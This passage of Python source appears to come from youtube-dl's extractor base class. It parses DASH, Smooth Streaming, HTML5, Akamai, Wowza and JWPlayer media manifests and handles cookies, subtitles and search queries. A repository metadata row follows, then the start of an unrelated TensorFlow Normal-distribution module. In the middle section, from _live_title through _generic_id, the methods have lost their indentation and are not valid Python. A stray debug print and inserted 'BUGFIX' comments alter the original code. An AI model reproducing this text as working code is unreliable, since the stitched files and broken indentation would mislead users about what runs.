                        'language': lang if lang not in ('mul', 'und', 'zxx', 'mis') else None,
                        'format_note': 'DASH %s' % content_type,
                        'filesize': filesize,
                        'container': mimetype2ext(mime_type) + '_dash',
                    }
                    f.update(parse_codecs(representation_attrib.get('codecs')))
                    representation_ms_info = extract_multisegment_info(representation, adaption_set_ms_info)

                    def prepare_template(template_name, identifiers):
                        tmpl = representation_ms_info[template_name]
                        # First of, % characters outside $...$ templates
                        # must be escaped by doubling for proper processing
                        # by % operator string formatting used further (see
                        # https://github.com/rg3/youtube-dl/issues/16867).
                        t = ''
                        in_template = False
                        for c in tmpl:
                            t += c
                            if c == '$':
                                in_template = not in_template
                            elif c == '%' and not in_template:
                                t += c
                        # Next, $...$ templates are translated to their
                        # %(...) counterparts to be used with % operator
                        t = t.replace('$RepresentationID$', representation_id)
                        t = re.sub(r'\$(%s)\$' % '|'.join(identifiers), r'%(\1)d', t)
                        t = re.sub(r'\$(%s)%%([^$]+)\$' % '|'.join(identifiers), r'%(\1)\2', t)
                        # Finally, $$ is an escape for a literal $ (see
                        # [1, 5.3.9.4.4, Table 16]). BUGFIX: str.replace
                        # returns a new string; the original discarded the
                        # result, leaving '$$' sequences unexpanded.
                        t = t.replace('$$', '$')
                        return t

                    # @initialization is a regular template like @media one
                    # so it should be handled just the same way (see
                    # https://github.com/rg3/youtube-dl/issues/11605)
                    if 'initialization' in representation_ms_info:
                        initialization_template = prepare_template(
                            'initialization',
                            # As per [1, 5.3.9.4.2, Table 15, page 54] $Number$ and
                            # $Time$ shall not be included for @initialization thus
                            # only $Bandwidth$ remains
                            ('Bandwidth', ))
                        representation_ms_info['initialization_url'] = initialization_template % {
                            'Bandwidth': bandwidth,
                        }

                    def location_key(location):
                        return 'url' if re.match(r'^https?://', location) else 'path'

                    if 'segment_urls' not in representation_ms_info and 'media' in representation_ms_info:

                        media_template = prepare_template('media', ('Number', 'Bandwidth', 'Time'))
                        media_location_key = location_key(media_template)

                        # As per [1, 5.3.9.4.4, Table 16, page 55] $Number$ and $Time$
                        # can't be used at the same time
                        if '%(Number' in media_template and 's' not in representation_ms_info:
                            segment_duration = None
                            if 'total_number' not in representation_ms_info and 'segment_duration' in representation_ms_info:
                                segment_duration = float_or_none(representation_ms_info['segment_duration'], representation_ms_info['timescale'])
                                representation_ms_info['total_number'] = int(math.ceil(float(period_duration) / segment_duration))
                            representation_ms_info['fragments'] = [{
                                media_location_key: media_template % {
                                    'Number': segment_number,
                                    'Bandwidth': bandwidth,
                                },
                                'duration': segment_duration,
                            } for segment_number in range(
                                representation_ms_info['start_number'],
                                representation_ms_info['total_number'] + representation_ms_info['start_number'])]
                        else:
                            # $Number*$ or $Time$ in media template with S list available
                            # Example $Number*$: http://www.svtplay.se/klipp/9023742/stopptid-om-bjorn-borg
                            # Example $Time$: https://play.arkena.com/embed/avp/v2/player/media/b41dda37-d8e7-4d3f-b1b5-9a9db578bdfe/1/129411
                            representation_ms_info['fragments'] = []
                            segment_time = 0
                            segment_d = None
                            segment_number = representation_ms_info['start_number']

                            def add_segment_url():
                                segment_url = media_template % {
                                    'Time': segment_time,
                                    'Bandwidth': bandwidth,
                                    'Number': segment_number,
                                }
                                representation_ms_info['fragments'].append({
                                    media_location_key: segment_url,
                                    'duration': float_or_none(segment_d, representation_ms_info['timescale']),
                                })

                            for num, s in enumerate(representation_ms_info['s']):
                                segment_time = s.get('t') or segment_time
                                segment_d = s['d']
                                add_segment_url()
                                segment_number += 1
                                # @r is the number of additional repeats of
                                # this segment duration.
                                for r in range(s.get('r', 0)):
                                    segment_time += segment_d
                                    add_segment_url()
                                    segment_number += 1
                                segment_time += segment_d
                    elif 'segment_urls' in representation_ms_info and 's' in representation_ms_info:
                        # No media template
                        # Example: https://www.youtube.com/watch?v=iXZV5uAYMJI
                        # or any YouTube dashsegments video
                        fragments = []
                        segment_index = 0
                        timescale = representation_ms_info['timescale']
                        for s in representation_ms_info['s']:
                            duration = float_or_none(s['d'], timescale)
                            for r in range(s.get('r', 0) + 1):
                                segment_uri = representation_ms_info['segment_urls'][segment_index]
                                fragments.append({
                                    location_key(segment_uri): segment_uri,
                                    'duration': duration,
                                })
                                segment_index += 1
                        representation_ms_info['fragments'] = fragments
                    elif 'segment_urls' in representation_ms_info:
                        # Segment URLs with no SegmentTimeline
                        # Example: https://www.seznam.cz/zpravy/clanek/cesko-zasahne-vitr-o-sile-vichrice-muze-byt-i-zivotu-nebezpecny-39091
                        # https://github.com/rg3/youtube-dl/pull/14844
                        fragments = []
                        segment_duration = float_or_none(
                            representation_ms_info['segment_duration'],
                            representation_ms_info['timescale']) if 'segment_duration' in representation_ms_info else None
                        for segment_url in representation_ms_info['segment_urls']:
                            fragment = {
                                location_key(segment_url): segment_url,
                            }
                            if segment_duration:
                                fragment['duration'] = segment_duration
                            fragments.append(fragment)
                        representation_ms_info['fragments'] = fragments
                    # NB: MPD manifest may contain direct URLs to unfragmented media.
                    # No fragments key is present in this case.
                    if 'fragments' in representation_ms_info:
                        f.update({
                            'fragment_base_url': base_url,
                            'fragments': [],
                            'protocol': 'http_dash_segments',
                        })
                        if 'initialization_url' in representation_ms_info:
                            initialization_url = representation_ms_info['initialization_url']
                            if not f.get('url'):
                                f['url'] = initialization_url
                            f['fragments'].append({location_key(initialization_url): initialization_url})
                        f['fragments'].extend(representation_ms_info['fragments'])
                    # According to [1, 5.3.5.2, Table 7, page 35] @id of Representation
                    # is not necessarily unique within a Period thus formats with
                    # the same `format_id` are quite possible. There are numerous examples
                    # of such manifests (see https://github.com/rg3/youtube-dl/issues/15111,
                    # https://github.com/rg3/youtube-dl/issues/13919)
                    full_info = formats_dict.get(representation_id, {}).copy()
                    full_info.update(f)
                    formats.append(full_info)
                else:
                    self.report_warning('Unknown MIME type %s in DASH manifest' % mime_type)
    return formats
def _extract_ism_formats(self, ism_url, video_id, ism_id=None, note=None, errnote=None, fatal=True):
    """Download a Smooth Streaming (ISM) manifest and parse its formats.

    Returns [] when the download fails and fatal is False.
    """
    downloaded = self._download_xml_handle(
        ism_url, video_id,
        note=note or 'Downloading ISM manifest',
        errnote=errnote or 'Failed to download ISM manifest',
        fatal=fatal)
    if downloaded is False:
        return []
    ism_doc, url_handle = downloaded
    return self._parse_ism_formats(ism_doc, url_handle.geturl(), ism_id)
def _parse_ism_formats(self, ism_doc, ism_url, ism_id=None):
    """
    Parse formats from ISM manifest.
    References:
     1. [MS-SSTR]: Smooth Streaming Protocol,
        https://msdn.microsoft.com/en-us/library/ff469518.aspx
    """
    # Live streams and DRM-protected content are not supported.
    if ism_doc.get('IsLive') == 'TRUE' or ism_doc.find('Protection') is not None:
        return []

    duration = int(ism_doc.attrib['Duration'])
    timescale = int_or_none(ism_doc.get('TimeScale')) or 10000000

    formats = []
    for stream in ism_doc.findall('StreamIndex'):
        stream_type = stream.get('Type')
        if stream_type not in ('video', 'audio'):
            continue
        url_pattern = stream.attrib['Url']
        stream_timescale = int_or_none(stream.get('TimeScale')) or timescale
        stream_name = stream.get('Name')
        for track in stream.findall('QualityLevel'):
            fourcc = track.get('FourCC', 'AACL' if track.get('AudioTag') == '255' else None)
            # TODO: add support for WVC1 and WMAP
            if fourcc not in ('H264', 'AVC1', 'AACL'):
                self.report_warning('%s is not a supported codec' % fourcc)
                continue
            tbr = int(track.attrib['Bitrate']) // 1000
            # [1] does not mention Width and Height attributes. However,
            # they're often present while MaxWidth and MaxHeight are
            # missing, so should be used as fallbacks
            width = int_or_none(track.get('MaxWidth') or track.get('Width'))
            height = int_or_none(track.get('MaxHeight') or track.get('Height'))
            sampling_rate = int_or_none(track.get('SamplingRate'))

            track_url_pattern = re.sub(r'{[Bb]itrate}', track.attrib['Bitrate'], url_pattern)
            track_url_pattern = compat_urlparse.urljoin(ism_url, track_url_pattern)

            fragments = []
            fragment_ctx = {
                'time': 0,
            }
            stream_fragments = stream.findall('c')
            for stream_fragment_index, stream_fragment in enumerate(stream_fragments):
                fragment_ctx['time'] = int_or_none(stream_fragment.get('t')) or fragment_ctx['time']
                fragment_repeat = int_or_none(stream_fragment.get('r')) or 1
                fragment_ctx['duration'] = int_or_none(stream_fragment.get('d'))
                if not fragment_ctx['duration']:
                    # @d missing: infer the duration from the next
                    # fragment's start time, falling back to the total
                    # duration for the last fragment. BUGFIX: the original
                    # indexed stream_fragment (the current <c> Element,
                    # whose [i] yields child elements) instead of the
                    # stream_fragments list, so this lookup always raised
                    # IndexError and used the total duration. KeyError is
                    # also caught in case the next <c> lacks a @t.
                    try:
                        next_fragment_time = int(stream_fragments[stream_fragment_index + 1].attrib['t'])
                    except (IndexError, KeyError):
                        next_fragment_time = duration
                    fragment_ctx['duration'] = (next_fragment_time - fragment_ctx['time']) / fragment_repeat
                for _ in range(fragment_repeat):
                    fragments.append({
                        'url': re.sub(r'{start[ _]time}', compat_str(fragment_ctx['time']), track_url_pattern),
                        'duration': fragment_ctx['duration'] / stream_timescale,
                    })
                    fragment_ctx['time'] += fragment_ctx['duration']

            format_id = []
            if ism_id:
                format_id.append(ism_id)
            if stream_name:
                format_id.append(stream_name)
            format_id.append(compat_str(tbr))

            formats.append({
                'format_id': '-'.join(format_id),
                'url': ism_url,
                'manifest_url': ism_url,
                'ext': 'ismv' if stream_type == 'video' else 'isma',
                'width': width,
                'height': height,
                'tbr': tbr,
                'asr': sampling_rate,
                'vcodec': 'none' if stream_type == 'audio' else fourcc,
                'acodec': 'none' if stream_type == 'video' else fourcc,
                'protocol': 'ism',
                'fragments': fragments,
                '_download_params': {
                    'duration': duration,
                    'timescale': stream_timescale,
                    'width': width or 0,
                    'height': height or 0,
                    'fourcc': fourcc,
                    'codec_private_data': track.get('CodecPrivateData'),
                    'sampling_rate': sampling_rate,
                    'channels': int_or_none(track.get('Channels', 2)),
                    'bits_per_sample': int_or_none(track.get('BitsPerSample', 16)),
                    'nal_unit_length_field': int_or_none(track.get('NALUnitLengthField', 4)),
                },
            })
    return formats
def _parse_html5_media_entries(self, base_url, webpage, video_id, m3u8_id=None, m3u8_entry_protocol='m3u8', mpd_id=None, preference=None):
    """Find HTML5 <video>/<audio> (and AMP equivalent) tags in a webpage
    and build one entry dict (formats + subtitles + thumbnail) per tag."""
    def absolute_url(item_url):
        return urljoin(base_url, item_url)

    def parse_content_type(content_type):
        # e.g. 'video/mp4; codecs="avc1.42E01E, mp4a.40.2"' -> ext + codecs.
        if not content_type:
            return {}
        ctr = re.search(r'(?P<mimetype>[^/]+/[^;]+)(?:;\s*codecs="?(?P<codecs>[^"]+))?', content_type)
        if ctr:
            mimetype, codecs = ctr.groups()
            f = parse_codecs(codecs)
            f['ext'] = mimetype2ext(mimetype)
            return f
        return {}

    def _media_formats(src, cur_media_type, type_info={}):
        # Returns (is_plain_url, formats): manifest URLs (HLS/DASH) expand
        # to several formats, a plain media URL yields exactly one.
        full_url = absolute_url(src)
        ext = type_info.get('ext') or determine_ext(full_url)
        if ext == 'm3u8':
            is_plain_url = False
            formats = self._extract_m3u8_formats(
                full_url, video_id, ext='mp4',
                entry_protocol=m3u8_entry_protocol, m3u8_id=m3u8_id,
                preference=preference, fatal=False)
        elif ext == 'mpd':
            is_plain_url = False
            formats = self._extract_mpd_formats(
                full_url, video_id, mpd_id=mpd_id, fatal=False)
        else:
            is_plain_url = True
            formats = [{
                'url': full_url,
                'vcodec': 'none' if cur_media_type == 'audio' else None,
            }]
        return is_plain_url, formats

    entries = []
    # amp-video and amp-audio are very similar to their HTML5 counterparts
    # so we will include them right here (see
    # https://www.ampproject.org/docs/reference/components/amp-video)
    media_tags = [(media_tag, media_type, '')
                  for media_tag, media_type
                  in re.findall(r'(?s)(<(?:amp-)?(video|audio)[^>]*/>)', webpage)]
    media_tags.extend(re.findall(
        # We only allow video|audio followed by a whitespace or '>'.
        # Allowing more characters may end up in significant slow down (see
        # https://github.com/rg3/youtube-dl/issues/11979, example URL:
        # http://www.porntrex.com/maps/videositemap.xml).
        r'(?s)(<(?P<tag>(?:amp-)?(?:video|audio))(?:\s+[^>]*)?>)(.*?)</(?P=tag)>', webpage))
    for media_tag, media_type, media_content in media_tags:
        media_info = {
            'formats': [],
            'subtitles': {},
        }
        media_attributes = extract_attributes(media_tag)
        src = media_attributes.get('src')
        if src:
            _, formats = _media_formats(src, media_type)
            media_info['formats'].extend(formats)
        media_info['thumbnail'] = absolute_url(media_attributes.get('poster'))
        if media_content:
            # Nested <source> elements: one format (or manifest) each.
            for source_tag in re.findall(r'<source[^>]+>', media_content):
                source_attributes = extract_attributes(source_tag)
                src = source_attributes.get('src')
                if not src:
                    continue
                f = parse_content_type(source_attributes.get('type'))
                is_plain_url, formats = _media_formats(src, media_type, f)
                if is_plain_url:
                    # res attribute is not standard but seen several times
                    # in the wild
                    f.update({
                        'height': int_or_none(source_attributes.get('res')),
                        'format_id': source_attributes.get('label'),
                    })
                    f.update(formats[0])
                    media_info['formats'].append(f)
                else:
                    media_info['formats'].extend(formats)
            # Nested <track> elements: subtitle/caption files.
            for track_tag in re.findall(r'<track[^>]+>', media_content):
                track_attributes = extract_attributes(track_tag)
                kind = track_attributes.get('kind')
                if not kind or kind in ('subtitles', 'captions'):
                    src = track_attributes.get('src')
                    if not src:
                        continue
                    lang = track_attributes.get('srclang') or track_attributes.get('lang') or track_attributes.get('label')
                    media_info['subtitles'].setdefault(lang, []).append({
                        'url': absolute_url(src),
                    })
        # Some servers check the Referer header when serving the media.
        for f in media_info['formats']:
            f.setdefault('http_headers', {})['Referer'] = base_url
        if media_info['formats'] or media_info['subtitles']:
            entries.append(media_info)
    return entries
def _extract_akamai_formats(self, manifest_url, video_id, hosts={}):
    """Extract both HDS and HLS renditions from an Akamai HD manifest URL,
    optionally overriding the host per protocol via the hosts mapping."""
    HDCORE_PARAM = 'hdcore=3.7.0'
    formats = []

    # HDS (Adobe HTTP Dynamic Streaming) variant of the manifest.
    f4m_url = re.sub(
        r'(https?://[^/]+)/i/', r'\1/z/', manifest_url).replace(
        '/master.m3u8', '/manifest.f4m')
    hds_host = hosts.get('hds')
    if hds_host:
        f4m_url = re.sub(r'(https?://)[^/]+', r'\1' + hds_host, f4m_url)
    if 'hdcore=' not in f4m_url:
        separator = '&' if '?' in f4m_url else '?'
        f4m_url = f4m_url + separator + HDCORE_PARAM
    f4m_formats = self._extract_f4m_formats(
        f4m_url, video_id, f4m_id='hds', fatal=False)
    # The hdcore parameter must also be carried over to segment URLs.
    for f4m_format in f4m_formats:
        f4m_format.update({'extra_param_to_segment_url': HDCORE_PARAM})
    formats.extend(f4m_formats)

    # HLS variant of the manifest.
    m3u8_url = re.sub(
        r'(https?://[^/]+)/z/', r'\1/i/', manifest_url).replace(
        '/manifest.f4m', '/master.m3u8')
    hls_host = hosts.get('hls')
    if hls_host:
        m3u8_url = re.sub(r'(https?://)[^/]+', r'\1' + hls_host, m3u8_url)
    formats.extend(self._extract_m3u8_formats(
        m3u8_url, video_id, 'mp4', 'm3u8_native',
        m3u8_id='hls', fatal=False))
    return formats
def _extract_wowza_formats(self, url, video_id, m3u8_entry_protocol='m3u8_native', skip_protocols=[]):
    """Probe a Wowza streaming server URL for HLS/HDS/DASH/SMIL/RTMP/RTSP
    renditions of the same stream, skipping protocols in skip_protocols."""
    query = compat_urlparse.urlparse(url).query
    # Strip a trailing per-protocol manifest filename so the one for each
    # probed protocol can be re-appended below.
    url = re.sub(r'/(?:manifest|playlist|jwplayer)\.(?:m3u8|f4m|mpd|smil)', '', url)
    mobj = re.search(
        r'(?:(?:http|rtmp|rtsp)(?P<s>s)?:)?(?P<url>//[^?]+)', url)
    url_base = mobj.group('url')
    # Keep the secure variant (https) if the input URL used one.
    http_base_url = '%s%s:%s' % ('http', mobj.group('s') or '', url_base)
    formats = []

    def manifest_url(manifest):
        m_url = '%s/%s' % (http_base_url, manifest)
        if query:
            m_url += '?%s' % query
        return m_url

    if 'm3u8' not in skip_protocols:
        formats.extend(self._extract_m3u8_formats(
            manifest_url('playlist.m3u8'), video_id, 'mp4',
            m3u8_entry_protocol, m3u8_id='hls', fatal=False))
    if 'f4m' not in skip_protocols:
        formats.extend(self._extract_f4m_formats(
            manifest_url('manifest.f4m'),
            video_id, f4m_id='hds', fatal=False))
    if 'dash' not in skip_protocols:
        formats.extend(self._extract_mpd_formats(
            manifest_url('manifest.mpd'),
            video_id, mpd_id='dash', fatal=False))
    if re.search(r'(?:/smil:|\.smil)', url_base):
        if 'smil' not in skip_protocols:
            rtmp_formats = self._extract_smil_formats(
                manifest_url('jwplayer.smil'),
                video_id, fatal=False)
            for rtmp_format in rtmp_formats:
                # Derive a matching RTSP format from each RTMP one.
                rtsp_format = rtmp_format.copy()
                rtsp_format['url'] = '%s/%s' % (rtmp_format['url'], rtmp_format['play_path'])
                del rtsp_format['play_path']
                del rtsp_format['ext']
                rtsp_format.update({
                    'url': rtsp_format['url'].replace('rtmp://', 'rtsp://'),
                    'format_id': rtmp_format['format_id'].replace('rtmp', 'rtsp'),
                    'protocol': 'rtsp',
                })
                formats.extend([rtmp_format, rtsp_format])
    else:
        for protocol in ('rtmp', 'rtsp'):
            if protocol not in skip_protocols:
                formats.append({
                    'url': '%s:%s' % (protocol, url_base),
                    'format_id': protocol,
                    'protocol': protocol,
                })
    return formats
def _find_jwplayer_data(self, webpage, video_id=None, transform_source=js_to_json):
    """Locate a jwplayer(...).setup({...}) call in a webpage and return its
    options as a dict; returns None when absent or unparseable."""
    mobj = re.search(
        r'(?s)jwplayer\((?P<quote>[\'"])[^\'" ]+(?P=quote)\)(?!</script>).*?\.setup\s*\((?P<options>[^)]+)\)',
        webpage)
    if not mobj:
        return
    try:
        jwplayer_data = self._parse_json(
            mobj.group('options'), video_id=video_id,
            transform_source=transform_source)
    except ExtractorError:
        return
    if isinstance(jwplayer_data, dict):
        return jwplayer_data
def _extract_jwplayer_data(self, webpage, video_id, *args, **kwargs):
    """Find jwplayer setup data in a webpage and parse it into entries."""
    jwplayer_data = self._find_jwplayer_data(
        webpage, video_id, transform_source=js_to_json)
    return self._parse_jwplayer_data(jwplayer_data, video_id, *args, **kwargs)
def _parse_jwplayer_data(self, jwplayer_data, video_id=None, require_title=True,
                         m3u8_id=None, mpd_id=None, rtmp_params=None, base_url=None):
    """Convert a jwplayer setup/config dict into a single info dict or,
    for multi-item playlists, a playlist result."""
    # JWPlayer backward compatibility: flattened playlists
    # https://github.com/jwplayer/jwplayer/blob/v7.4.3/src/js/api/config.js#L81-L96
    if 'playlist' not in jwplayer_data:
        jwplayer_data = {'playlist': [jwplayer_data]}

    entries = []

    # JWPlayer backward compatibility: single playlist item
    # https://github.com/jwplayer/jwplayer/blob/v7.7.0/src/js/playlist/playlist.js#L10
    if not isinstance(jwplayer_data['playlist'], list):
        jwplayer_data['playlist'] = [jwplayer_data['playlist']]

    for video_data in jwplayer_data['playlist']:
        # JWPlayer backward compatibility: flattened sources
        # https://github.com/jwplayer/jwplayer/blob/v7.4.3/src/js/playlist/item.js#L29-L35
        if 'sources' not in video_data:
            video_data['sources'] = [video_data]

        this_video_id = video_id or video_data['mediaid']

        formats = self._parse_jwplayer_formats(
            video_data['sources'], video_id=this_video_id, m3u8_id=m3u8_id,
            mpd_id=mpd_id, rtmp_params=rtmp_params, base_url=base_url)

        subtitles = {}
        tracks = video_data.get('tracks')
        if tracks and isinstance(tracks, list):
            for track in tracks:
                if not isinstance(track, dict):
                    continue
                track_kind = track.get('kind')
                if not track_kind or not isinstance(track_kind, compat_str):
                    continue
                # Only caption/subtitle tracks are of interest here.
                if track_kind.lower() not in ('captions', 'subtitles'):
                    continue
                track_url = urljoin(base_url, track.get('file'))
                if not track_url:
                    continue
                subtitles.setdefault(track.get('label') or 'en', []).append({
                    'url': self._proto_relative_url(track_url)
                })

        entry = {
            'id': this_video_id,
            'title': unescapeHTML(video_data['title'] if require_title else video_data.get('title')),
            'description': video_data.get('description'),
            'thumbnail': self._proto_relative_url(video_data.get('image')),
            'timestamp': int_or_none(video_data.get('pubdate')),
            'duration': float_or_none(jwplayer_data.get('duration') or video_data.get('duration')),
            'subtitles': subtitles,
        }
        # https://github.com/jwplayer/jwplayer/blob/master/src/js/utils/validator.js#L32
        # A lone YouTube source is delegated via url_transparent instead
        # of being listed as a direct format.
        if len(formats) == 1 and re.search(r'^(?:http|//).*(?:youtube\.com|youtu\.be)/.+', formats[0]['url']):
            entry.update({
                '_type': 'url_transparent',
                'url': formats[0]['url'],
            })
        else:
            self._sort_formats(formats)
            entry['formats'] = formats
        entries.append(entry)
    if len(entries) == 1:
        return entries[0]
    else:
        return self.playlist_result(entries)
def _parse_jwplayer_formats(self, jwplayer_sources_data, video_id=None,
                            m3u8_id=None, mpd_id=None, rtmp_params=None, base_url=None):
    """Turn a jwplayer 'sources' list into a list of format dicts,
    expanding HLS/DASH/SMIL manifests and handling RTMP URLs."""
    urls = []  # de-duplicates resolved source URLs
    formats = []
    for source in jwplayer_sources_data:
        if not isinstance(source, dict):
            continue
        source_url = self._proto_relative_url(source.get('file'))
        if not source_url:
            continue
        if base_url:
            source_url = compat_urlparse.urljoin(base_url, source_url)
        if source_url in urls:
            continue
        urls.append(source_url)
        source_type = source.get('type') or ''
        ext = mimetype2ext(source_type) or determine_ext(source_url)
        if source_type == 'hls' or ext == 'm3u8':
            formats.extend(self._extract_m3u8_formats(
                source_url, video_id, 'mp4', entry_protocol='m3u8_native',
                m3u8_id=m3u8_id, fatal=False))
        elif source_type == 'dash' or ext == 'mpd':
            formats.extend(self._extract_mpd_formats(
                source_url, video_id, mpd_id=mpd_id, fatal=False))
        elif ext == 'smil':
            formats.extend(self._extract_smil_formats(
                source_url, video_id, fatal=False))
        # https://github.com/jwplayer/jwplayer/blob/master/src/js/providers/default.js#L67
        elif source_type.startswith('audio') or ext in (
                'oga', 'aac', 'mp3', 'mpeg', 'vorbis'):
            formats.append({
                'url': source_url,
                'vcodec': 'none',
                'ext': ext,
            })
        else:
            height = int_or_none(source.get('height'))
            if height is None:
                # Often no height is provided but there is a label in
                # format like "1080p", "720p SD", or 1080.
                height = int_or_none(self._search_regex(
                    r'^(\d{3,4})[pP]?(?:\b|$)', compat_str(source.get('label') or ''),
                    'height', default=None))
            a_format = {
                'url': source_url,
                'width': int_or_none(source.get('width')),
                'height': height,
                'tbr': int_or_none(source.get('bitrate')),
                'ext': ext,
            }
            if source_url.startswith('rtmp'):
                a_format['ext'] = 'flv'
                # See com/longtailvideo/jwplayer/media/RTMPMediaProvider.as
                # of jwplayer.flash.swf
                rtmp_url_parts = re.split(
                    r'((?:mp4|mp3|flv):)', source_url, 1)
                if len(rtmp_url_parts) == 3:
                    rtmp_url, prefix, play_path = rtmp_url_parts
                    a_format.update({
                        'url': rtmp_url,
                        'play_path': prefix + play_path,
                    })
                if rtmp_params:
                    a_format.update(rtmp_params)
            formats.append(a_format)
    return formats
def _live_title(self, name):
""" Generate the title for a live video """
now = datetime.datetime.now()
now_str = now.strftime('%Y-%m-%d %H:%M')
return name + ' ' + now_str
def _int(self, v, name, fatal=False, **kwargs):
res = int_or_none(v, **kwargs)
if 'get_attr' in kwargs:
print(getattr(v, kwargs['get_attr']))
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _float(self, v, name, fatal=False, **kwargs):
res = float_or_none(v, **kwargs)
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _set_cookie(self, domain, name, value, expire_time=None, port=None,
path='/', secure=False, discard=False, rest={}, **kwargs):
cookie = compat_cookiejar.Cookie(
0, name, value, port, port is not None, domain, True,
domain.startswith('.'), path, True, secure, expire_time,
discard, None, None, rest)
self._downloader.cookiejar.set_cookie(cookie)
def _get_cookies(self, url):
""" Return a compat_cookies.SimpleCookie with the cookies for the url """
req = sanitized_Request(url)
self._downloader.cookiejar.add_cookie_header(req)
return compat_cookies.SimpleCookie(req.get_header('Cookie'))
def get_testcases(self, include_onlymatching=False):
t = getattr(self, '_TEST', None)
if t:
assert not hasattr(self, '_TESTS'), \
'%s has _TEST and _TESTS' % type(self).__name__
tests = [t]
else:
tests = getattr(self, '_TESTS', [])
for t in tests:
if not include_onlymatching and t.get('only_matching', False):
continue
t['name'] = type(self).__name__[:-len('IE')]
yield t
def is_suitable(self, age_limit):
""" Test whether the extractor is generally suitable for the given
age limit (i.e. pornographic sites are not, all others usually are) """
any_restricted = False
for tc in self.get_testcases(include_onlymatching=False):
if tc.get('playlist', []):
tc = tc['playlist'][0]
is_restricted = age_restricted(
tc.get('info_dict', {}).get('age_limit'), age_limit)
if not is_restricted:
return True
any_restricted = any_restricted or is_restricted
return not any_restricted
def extract_subtitles(self, *args, **kwargs):
if (self._downloader.params.get('writesubtitles', False) or
self._downloader.params.get('listsubtitles')):
return self._get_subtitles(*args, **kwargs)
return {}
    def _get_subtitles(self, *args, **kwargs):
        # Hook for subclasses that support subtitles; the public
        # extract_subtitles() wrapper decides whether to call it.
        raise NotImplementedError('This method must be implemented by subclasses')
@staticmethod
def _merge_subtitle_items(subtitle_list1, subtitle_list2):
""" Merge subtitle items for one language. Items with duplicated URLs
will be dropped. """
list1_urls = set([item['url'] for item in subtitle_list1])
ret = list(subtitle_list1)
ret.extend([item for item in subtitle_list2 if item['url'] not in list1_urls])
return ret
@classmethod
def _merge_subtitles(cls, subtitle_dict1, subtitle_dict2):
""" Merge two subtitle dictionaries, language by language. """
ret = dict(subtitle_dict1)
for lang in subtitle_dict2:
ret[lang] = cls._merge_subtitle_items(subtitle_dict1.get(lang, []), subtitle_dict2[lang])
return ret
def extract_automatic_captions(self, *args, **kwargs):
if (self._downloader.params.get('writeautomaticsub', False) or
self._downloader.params.get('listsubtitles')):
return self._get_automatic_captions(*args, **kwargs)
return {}
    def _get_automatic_captions(self, *args, **kwargs):
        # Hook for subclasses that support automatic captions; called only
        # via the public extract_automatic_captions() wrapper.
        raise NotImplementedError('This method must be implemented by subclasses')
def mark_watched(self, *args, **kwargs):
if (self._downloader.params.get('mark_watched', False) and
(self._get_login_info()[0] is not None or
self._downloader.params.get('cookiefile') is not None)):
self._mark_watched(*args, **kwargs)
    def _mark_watched(self, *args, **kwargs):
        # Hook for subclasses that can mark a video as watched on the site.
        raise NotImplementedError('This method must be implemented by subclasses')
def geo_verification_headers(self):
headers = {}
geo_verification_proxy = self._downloader.params.get('geo_verification_proxy')
if geo_verification_proxy:
headers['Ytdl-request-proxy'] = geo_verification_proxy
return headers
def _generic_id(self, url):
return compat_urllib_parse_unquote(os.path.splitext(url.rstrip('/').split('/')[-1])[0])
    def _generic_title(self, url):
        # Fallback title: the URL's basename without extension, percent-decoded.
        return compat_urllib_parse_unquote(os.path.splitext(url_basename(url))[0])
class SearchInfoExtractor(InfoExtractor):
    """
    Base class for paged search queries extractors.
    They accept URLs in the format _SEARCH_KEY(|all|[0-9]):{query}
    Instances should define _SEARCH_KEY and _MAX_RESULTS.
    """
    @classmethod
    def _make_valid_url(cls):
        # prefix is empty (one result), a positive integer, or the word "all".
        return r'%s(?P<prefix>|[1-9][0-9]*|all):(?P<query>[\s\S]+)' % cls._SEARCH_KEY
    @classmethod
    def suitable(cls, url):
        # A URL is handled by this extractor iff it matches the search pattern.
        pattern = cls._make_valid_url()
        return re.match(pattern, url) is not None
    def _real_extract(self, query):
        match = re.match(self._make_valid_url(), query)
        if match is None:
            raise ExtractorError('Invalid search query "%s"' % query)
        prefix = match.group('prefix')
        terms = match.group('query')
        if prefix == '':
            return self._get_n_results(terms, 1)
        if prefix == 'all':
            return self._get_n_results(terms, self._MAX_RESULTS)
        n = int(prefix)
        if n <= 0:
            raise ExtractorError('invalid download number %s for query "%s"' % (n, terms))
        if n > self._MAX_RESULTS:
            # Clamp to the site's maximum and let the user know.
            self._downloader.report_warning('%s returns max %i results (you requested %i)' % (self._SEARCH_KEY, self._MAX_RESULTS, n))
            n = self._MAX_RESULTS
        return self._get_n_results(terms, n)
    def _get_n_results(self, query, n):
        """Get a specified number of results for a query"""
        raise NotImplementedError('This method must be implemented by subclasses')
    @property
    def SEARCH_KEY(self):
        return self._SEARCH_KEY
|
stannynuytkens/youtube-dl
|
youtube_dl/extractor/common.py
|
Python
|
unlicense
| 133,604
|
[
"VisIt"
] |
3abe2d3b0a052b28de7aa97949e984ffa043db59a3b9233900ec359d77203909
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Normal (Gaussian) distribution class."""
import math
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import kullback_leibler
from tensorflow.python.ops.distributions import special_math
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
# Public API of this module.
__all__ = [
    "Normal",
    "NormalWithSoftplusScale",
]
@tf_export(v1=["distributions.Normal"])
class Normal(distribution.Distribution):
  """The Normal distribution with location `loc` and `scale` parameters.
  #### Mathematical details
  The probability density function (pdf) is,
  ```none
